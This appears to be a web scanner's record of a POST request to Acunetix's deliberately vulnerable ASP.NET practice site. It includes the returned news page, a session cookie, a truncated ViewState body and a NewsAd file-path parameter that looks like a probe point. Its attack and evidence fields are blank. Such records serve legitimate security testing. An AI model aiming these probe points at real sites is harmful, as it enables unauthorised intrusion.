Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucy